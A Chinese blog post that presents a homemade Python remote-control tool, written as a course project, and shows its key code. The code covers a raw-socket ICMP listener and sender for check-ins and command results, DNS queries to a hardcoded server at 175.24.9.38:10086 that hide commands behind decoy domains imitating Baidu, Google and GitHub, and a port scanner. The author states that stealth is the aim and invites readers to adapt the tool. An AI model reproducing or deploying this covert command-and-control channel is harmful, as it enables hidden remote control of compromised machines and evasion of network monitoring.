自制远控—DNS+ICMP通信

在Python群里看见一个单子,计算机网络课的课设,要求用Python写一个与网络安全有关的程序;正好自己准备写个远控,所以就接下来了。
用了ICMP+DNS两套协议来加强隐蔽,也正好符合计网学的东西,DNS用来传输命令,ICMP通知上线以及传命令执行的结果。没有什么高级的算法和数据结构,纯基础的拼凑……而且由于是在Linux上写的,转到windows上后又会有很多兼容问题……感兴趣的师傅可以稍微改改。
以下仅记录关键代码,完整代码可以在我的github找到
https://github.com/hausa-han/easy_remote_control/

ICMP服务端

import socket
import struct
rawsocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
rawsocket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
cmdresult = []
while True:
    pkt = rawsocket.recvfrom(4096)
    message = pkt[0].decode("utf-8", "ignore")[-48:]
    ip = pkt[1][0]

发ICMP包:

def send_packet(ip, key, message):
    rawsocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
    packet = struct.pack('!BBHHH48s', 8, 0, 0, 1, 0, message.encode('utf-8'))
    chksum = checksum(packet)
    packet = struct.pack('!BBHHH48s', 8, 0, chksum, 1, 0, message.encode('utf-8'))
    rawsocket.sendto(packet, (ip, 0))
def cutmessage(text, lenth):
    result = findall('.{' + str(lenth) + '}', text)
    result.append(text[len(result)*lenth:])
    result[-1] = result[-1]+"@"
    return result

DNS查询:

    a = dns.resolver.Resolver()
    a.nameservers = ["175.24.9.38"]
    a.port = 10086
    cmd = ""
    dnsresult = ""
    servers = ["www.api.baidu.com", "www.zoom.google.vip", "api.pan.baidu.com", "zz.github.org", "video.blowtoheaven.onion"]
    while True:
        try:
            for n in range(0,5):
                sleep(sleep_time)
                if servers[n][-1:] == ".":
                    servers[n] = servers[n][:-1]
                an = a.query(servers[n])
                for i in an.response.answer:
                    for s in i.items:
                        dnsresult = dnsresult + str(s) + "."
            dnsresult = dnsresult.split(".")
            for i in dnsresult:
                if i == "7":
                    break;
                cmd = cmd + chr(int(i))

端口扫描功能:

def scan(ip, key,target):
    result = []
    portlist = [7,9,13,21,22,25,37,53,79,80,88,106,110,113,119,135,139,143,179,199,389,427,443,445,465,513,514,543,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1110,1433,1720,1723,1755,1900,2000,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6646,7070,8000,8008,8080,8443,8888,9100,9999,32768,49152,49153,49154,49155,49156]
    for port in portlist:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(1)
            r = s.connect_ex((target, port))
            if r == 0:
                result.append(str(port))
                print(port)
            else:
                continue
        except Exception as e:
            pass
        finally:
            s.close()
    with open("temp.txt", "w") as f:
        f.write("")
    with open("temp.txt", "w+") as f:
        for i in result:
            f.write(i+"\n")

以上共勉。